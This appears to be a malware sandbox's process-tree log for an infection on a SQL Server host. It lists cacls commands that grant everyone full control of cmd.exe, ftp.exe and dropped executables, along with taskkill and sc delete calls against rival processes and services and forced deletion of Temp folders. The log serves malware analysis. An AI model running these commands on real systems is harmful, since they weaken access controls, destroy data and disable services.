C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:3808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:4992

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:1100

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:4220

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:4036

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:3528

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:1368

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:3416

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:1936

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f
2⤵
PID:3852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f
3⤵
PID:3752

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:3488

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:5024

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:4344

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:1268

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:4796

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTC.exe
2⤵
PID:4536

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTC.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5084

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
4⤵
PID:4728

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTC.exe
2⤵
PID:4272

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTC.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:1756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:1276

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f
2⤵
PID:1548

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f
3⤵
PID:2036

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:3036

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f
2⤵
PID:5048

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f
3⤵
PID:596

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:5052

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTN.exe
2⤵
PID:1592

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTN.exe
3⤵
PID:5076

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTN.exe
2⤵
PID:2236

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTN.exe
3⤵
- Kills process with taskkill
PID:2900

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTA.exe
2⤵
PID:2848

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTA.exe
3⤵
PID:3160

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTA.exe
2⤵
PID:3140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTA.exe
3⤵
- Kills process with taskkill
PID:1304

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:4132

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:4404

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:4548

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:1900

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:3740

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:3840

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:3668

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:3504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:5036

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:1112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:2784

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:4928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:3364

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:3892

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:4164

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:5112

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:4788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:4524

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:3180

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f
2⤵
PID:2004

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f
3⤵
PID:4264

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATC.exe
2⤵
PID:3284

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATC.exe
3⤵
- Kills process with taskkill
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATC.exe
2⤵
PID:3924

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATC.exe
3⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATN.exe
2⤵
PID:1220

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATN.exe
3⤵
- Kills process with taskkill
PID:3960

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATN.exe
2⤵
PID:1064

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATN.exe
3⤵
PID:836

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATA.exe
2⤵
PID:2036

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATA.exe
3⤵
- Kills process with taskkill
PID:2820

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATA.exe
2⤵
PID:1548

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATA.exe
3⤵
- Kills process with taskkill
PID:3500

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\MSSQL~1\AppData\Local\Temp\*
2⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\MSSQLSERVER\AppData\Local\Temp\*
2⤵
PID:4436

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\Temp\*
2⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\*
2⤵
PID:1228

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\Administrator\AppData\Local\Temp\*
2⤵
PID:4384

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\TempUpdate2.bat
2⤵
PID:924

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f
3⤵
PID:3040

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f
3⤵
PID:2704

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f
3⤵
PID:4520

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f
3⤵
PID:5104

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f
3⤵
PID:3452

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f
4⤵
PID:1480

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f
3⤵
PID:420

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f
4⤵
PID:3208

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f
3⤵
PID:4456

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f
3⤵
PID:3240

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f
3⤵
PID:1760

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f
3⤵
PID:4504

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f
3⤵
PID:4764

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f
3⤵
PID:4272

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g system:f
3⤵
PID:4948

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f
3⤵
PID:1152

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g system:f
3⤵
PID:3384

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
4⤵
PID:4116

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f
3⤵
PID:4448

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f
3⤵
PID:5028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
4⤵
PID:5108

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f
3⤵
PID:4908

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f
3⤵
PID:4792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
4⤵
PID:2392

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f
3⤵
PID:4648

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g system:f
3⤵
PID:4308

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f
3⤵
PID:4944

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g system:f
3⤵
PID:3620

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f
3⤵
PID:4324

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sqltem64.exe
3⤵
- Kills process with taskkill
PID:1380

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sqltem64.exe
3⤵
PID:920

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
- Kills process with taskkill
PID:4776

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
PID:4936

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols" /t /e /c /r everyone
3⤵
PID:3160

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols" /t /e /c /r system
3⤵
PID:2460

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone
3⤵
PID:4968

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r system
3⤵
PID:4388

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols" /t /e /c /r everyone
3⤵
PID:4716

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols" /t /e /c /r system
3⤵
PID:1028

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\*" /t /e /c /r everyone
3⤵
PID:2972

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\*" /t /e /c /r system
3⤵
PID:892

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone
3⤵
PID:1988

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system
3⤵
PID:4068

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe" /t /e /c /r everyone
3⤵
PID:4980

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\Diskraid.exe /t /e /c /r system
3⤵
PID:1240

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\*" /t /e /c /r everyone
3⤵
PID:4340

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\*" /t /e /c /r system
3⤵
PID:1560

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r everyone
3⤵
PID:3364

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft SQL Server\Sqltem64.exe" /t /e /c /r system
3⤵
PID:2316

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r everyone
3⤵
PID:3740

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols\Diskraid.exe" /t /e /c /r system
3⤵
PID:944

C:\Windows\SysWOW64\sc.exe
sc delete "Norporati Windows AppVNice"
3⤵
PID:1168

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Windows SystenApp"
3⤵
PID:2884

C:\Windows\SysWOW64\sc.exe
sc delete "dorporati windows dribe diskraid"
3⤵
PID:592

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Kills process with taskkill
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Kills process with taskkill
PID:4824

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
PID:2080

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Kills process with taskkill
PID:708

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SystenApp" /t /e /c /r everyone
3⤵
PID:3068

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SystenApp" /t /e /c /r system
3⤵
PID:1900

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols" /t /e /c /r everyone
3⤵
PID:4464

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemBols" /t /e /c /r system
3⤵
PID:3644

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft SystenApp" /t /e /c /r everyone
3⤵
PID:4624

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files\Microsoft SystenApp" /t /e /c /r system
3⤵
PID:4964

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\AppVNice.exe" /t /e /c /r everyone
3⤵
PID:1996

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\WindowsSystemBols\AppVNice.exe" /t /e /c /r system
3⤵
PID:1556

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Program Files (x86)\Microsoft SystenApp" /t /e /c /r everyone
3⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cacls.exe /e /t /g everyone:f
2⤵
PID:4148

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f
3⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g everyone:f
2⤵
PID:2780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f
3⤵
PID:4072

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f
2⤵
PID:2044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g everyone:f
3⤵
PID:3208

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f
2⤵
PID:3556

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g everyone:f
3⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cacls.exe /e /t /g system:f
2⤵
PID:3768

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g system:f
3⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cacls.exe /e /t /g system:f
2⤵
PID:4620

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f
3⤵
PID:2396

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cacls.exe /e /t /g system:f
2⤵
PID:4796

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cacls.exe /e /t /g system:f
3⤵
PID:4180

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f
2⤵
PID:836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cacls.exe /e /t /g system:f
3⤵
PID:3280

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f
2⤵
PID:4436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f
3⤵
PID:1100

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cmd.exe /e /t /g system:f
2⤵
PID:1300

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g system:f
3⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g system:f
2⤵
PID:2148

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g system:f
3⤵
PID:1040

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cmd.exe /e /t /g system:f
2⤵
PID:2532

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g system:f
3⤵
PID:1232

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f
2⤵
PID:3528

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f
3⤵
PID:2760

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f
2⤵
PID:4200

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\cmd.exe /e /t /g everyone:f
2⤵
PID:4208

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /t /g everyone:f
3⤵
PID:4184

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\cmd.exe /e /t /g everyone:f
2⤵
PID:4328

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /t /g everyone:f
3⤵
PID:2336

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f
2⤵
PID:1944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f
3⤵
PID:3264

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\ftp.exe /e /t /g system:f
2⤵
PID:3240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g system:f
3⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
2⤵
PID:692

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
3⤵
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5076

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4180

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
2⤵
PID:4944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
3⤵
PID:4072

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4124

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
2⤵
PID:4308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
3⤵
PID:5056

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:4280

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3824

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4792

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3552

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
2⤵
PID:2152

